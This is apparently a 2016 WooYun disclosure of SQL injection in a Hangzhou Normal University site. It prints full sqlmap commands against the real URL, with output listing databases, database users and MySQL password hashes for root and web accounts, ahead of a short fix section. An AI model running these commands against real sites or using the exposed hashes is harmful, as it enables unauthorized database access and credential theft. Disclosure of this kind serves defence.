
Vulnerability summary

Defect ID: wooyun-2016-0172949

Title: SQL injection in a Hangzhou Normal University site (DBA privileges)

Vendor: Hangzhou Normal University

Author: hellokuku

Submitted: 2016-01-27 10:00

Fix time: 2016-02-01 10:10

Public disclosure: 2016-02-01 10:10

Type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-01-27: Details sent to the vendor, awaiting vendor handling
2016-02-01: Vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

As the title says: SQL injection in a Hangzhou Normal University site.

Detailed description:

While testing I found that a Hangzhou Normal University site is injectable and obtained the DBA password hash.
Injection point: http://youth.hznu.edu.cn/list_all.php?classid=46

Proof of vulnerability:

Run sqlmap:

$ sqlmap -u 'http://youth.hznu.edu.cn/list_all.php?classid=46' -v 1 --dbs --batch
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 21:54:57
[21:54:57] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/youth.hznu.edu.cn/session' as session file
[21:54:57] [INFO] testing connection to the target url
[21:55:01] [INFO] testing if the url is stable, wait a few seconds
[21:55:03] [INFO] url is stable
[21:55:03] [INFO] testing if GET parameter 'classid' is dynamic
[21:55:03] [INFO] confirming that GET parameter 'classid' is dynamic
[21:55:04] [INFO] GET parameter 'classid' is dynamic
[21:55:06] [WARNING] heuristic test shows that GET parameter 'classid' might not be injectable
[21:55:06] [INFO] testing sql injection on GET parameter 'classid'
[21:55:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:55:13] [INFO] GET parameter 'classid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[21:55:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[21:55:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:55:15] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[21:55:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:55:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:55:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[21:55:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[21:55:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:55:42] [INFO] GET parameter 'classid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[21:55:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:55:53] [INFO] target url appears to be UNION injectable with 7 columns
[21:56:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:56:14] [INFO] target url appears to be UNION injectable with 7 columns
[21:56:27] [INFO] GET parameter 'classid' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=46 AND 487=487
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=46 AND SLEEP(5)
---
[21:56:27] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.8, PHP 5.2.5
back-end DBMS: MySQL 5.0.11
[21:56:27] [INFO] fetching database names
[21:56:27] [INFO] fetching number of databases
[21:56:27] [INFO] retrieved: 5
[21:56:35] [INFO] retrieved: information_schema
[21:59:25] [INFO] retrieved: cms
[22:00:07] [INFO] retrieved: mysql
[22:01:12] [INFO] retrieved: sqlweb_shida
[22:03:13] [INFO] retrieved: test
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] sqlweb_shida
[*] test
[22:04:09] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/youth.hznu.edu.cn'
[*] shutting down at: 22:04:09


Enumerate database users:

$ sqlmap -u 'http://youth.hznu.edu.cn/list_all.php?classid=46' --users --batch
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 18:04:54
[18:04:54] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/youth.hznu.edu.cn/session' as session file
[18:04:54] [INFO] resuming injection data from session file
[18:04:54] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[18:04:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=46 AND 4559=4559
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=46 AND SLEEP(5)
---
[18:04:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.8, PHP 5.2.5
back-end DBMS: MySQL 5.0.11
[18:04:55] [INFO] fetching database users
[18:04:55] [INFO] fetching number of database users
[18:04:55] [INFO] retrieved: 10
[18:05:11] [INFO] retrieved: 'root'@'localhost'
[18:08:19] [INFO] retrieved: 'root'@'production.mysql.com'
[18:12:39] [INFO] retrieved: 'root'@'127.0.0.1'
[18:15:31] [INFO] retrieved: 'web9429504'@'localhost'
[18:19:15] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[18:19:41] [INFO] retrieved: 'webtwei'@'127.0.0.1'
[18:22:18] [INFO] retrieved: 'webtwei'@'localhost'
[18:25:17] [INFO] retrieved: ''@'localhost'
[18:27:08] [INFO] retrieved: ''@'production.mysql.com'
[18:30:30] [INFO] retrieved: 'webtwei'@'%'
[18:32:24] [INFO] retrieved: 'xinshengweb'@'%'
database management system users [10]:
[*] ''@'localhost'
[*] ''@'production.mysql.com'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'production.mysql.com'
[*] 'web9429504'@'localhost'
[*] 'webtwei'@'%'
[*] 'webtwei'@'127.0.0.1'
[*] 'webtwei'@'localhost'
[*] 'xinshengweb'@'%'
[18:34:55] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/youth.hznu.edu.cn'
[*] shutting down at: 18:34:55


Dump password hashes:

$ sqlmap -u 'http://youth.hznu.edu.cn/list_all.php?classid=46' --password --batch
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 22:05:48
[22:05:48] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/youth.hznu.edu.cn/session' as session file
[22:05:48] [INFO] resuming injection data from session file
[22:05:48] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[22:05:48] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=46 AND 487=487
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=46 AND SLEEP(5)
---
[22:05:50] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.8, PHP 5.2.5
back-end DBMS: MySQL 5.0.11
[22:05:50] [INFO] fetching database users password hashes
[22:05:50] [INFO] fetching database users
[22:05:50] [INFO] fetching number of database users
[22:05:50] [INFO] retrieved: 10
[22:06:02] [INFO] retrieved: 'root'@'localhost'
[22:08:50] [INFO] retrieved: 'root'@'production.mysql.com'
[22:13:21] [INFO] retrieved: 'root'@'127.0.0.1'
[22:16:51] [INFO] retrieved: 'web9429504'@'localhost'
[22:19:01] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[22:20:50] [INFO] retrieved: 'webtwei'@'127.0.0.1'
[22:23:58] [INFO] retrieved: 'webtwei'@'localhost'
[22:27:09] [INFO] retrieved: ''@'localhost'
[22:29:27] [INFO] retrieved: ''@'production.mysql.com'
[22:33:12] [INFO] retrieved: 'webtwei'@'%'
[22:35:10] [INFO] retrieved: 'xinshengweb'@'%'
[22:37:44] [INFO] fetching number of password hashes for user 'root'
[22:37:44] [INFO] retrieved: 2
[22:37:54] [INFO] fetching password hashes for user 'root'
[22:37:54] [INFO] retrieved: *27CF2F764E3D80D1D67FFEBC14DE47D0BF4A2585
[22:43:52] [INFO] retrieved:
[22:44:00] [INFO] fetching number of password hashes for user 'web9429504'
[22:44:00] [INFO] retrieved: 1
[22:44:07] [INFO] fetching password hashes for user 'web9429504'
[22:44:07] [INFO] retrieved: *C39F1ACA5818C37CEFA20F30422A14720CCB5092
[22:49:39] [INFO] fetching number of password hashes for user 'webtwei'
[22:49:39] [INFO] retrieved: 1
[22:49:44] [INFO] fetching password hashes for user 'webtwei'
[22:49:44] [INFO] retrieved: *BE89FA3840700821F13FBC67F65BDCB315531F81
[22:55:27] [INFO] fetching number of password hashes for user 'xinshengweb'
[22:55:27] [INFO] retrieved: 1
[22:55:33] [INFO] fetching password hashes for user 'xinshengweb'
[22:55:33] [INFO] retrieved: *427DF4453F376141948E0DE24EC8566C7D3AE6A2
[22:56:15] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[22:57:43] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[23:02:09] [INFO] do you want to use dictionary attack on retrieved password hashes? [Y/n/q] Y
[23:02:09] [INFO] using hash method: 'mysql_passwd'
[23:02:09] [INFO] what's the dictionary's location? [/usr/local/Cellar/sqlmap/0.9_1/libexec/txt/wordlist.txt] /usr/local/Cellar/sqlmap/0.9_1/libexec/txt/wordlist.txt
[23:02:09] [INFO] loading dictionary from: '/usr/local/Cellar/sqlmap/0.9_1/libexec/txt/wordlist.txt'
[23:02:09] [INFO] do you want to use common password suffixes? (slow!) [y/N] N
[23:02:09] [INFO] starting dictionary attack (mysql_passwd)
[23:02:12] [WARNING] no clear password(s) found
database management system users password hashes:
[*] root [2]:
password hash: *27CF2F764E3D80D1D67FFEBC14DE47D0BF4A2585
password hash: NULL
[*] web9429504 [1]:
password hash: *C39F1ACA5818C37CEFA20F30422A14720CCB5092
[*] webtwei [1]:
password hash: *BE89FA3840700821F13FBC67F65BDCB315531F81
[*] xinshengweb [1]:
password hash: *427DF4453F376141948E0DE24EC8566C7D3AE6A2
[23:02:12] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/youth.hznu.edu.cn'

Fix:

Do not concatenate classid into the SQL text: validate it as an integer and pass it as a bound parameter of a prepared statement. Independently of that, the dump above shows that the site's MySQL account can read mysql.user; run the site under a dedicated account limited to the cms database so that a residual injection cannot reach server credentials, and rotate the root and web account passwords whose hashes have been exposed.

Copyright notice: reproduction must credit the source, hellokuku@WooYun


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2016-02-01 10:10

Vendor reply:

Vulnerability Rank: 2 (WooYun rating)

Latest status:

None